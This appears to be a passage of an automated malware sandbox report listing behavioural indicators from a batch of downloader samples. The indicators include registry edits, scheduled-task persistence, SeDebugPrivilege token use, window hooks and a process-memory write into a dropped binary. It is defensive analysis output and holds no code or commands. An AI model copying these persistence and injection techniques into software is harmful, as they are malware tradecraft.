Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "1006" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
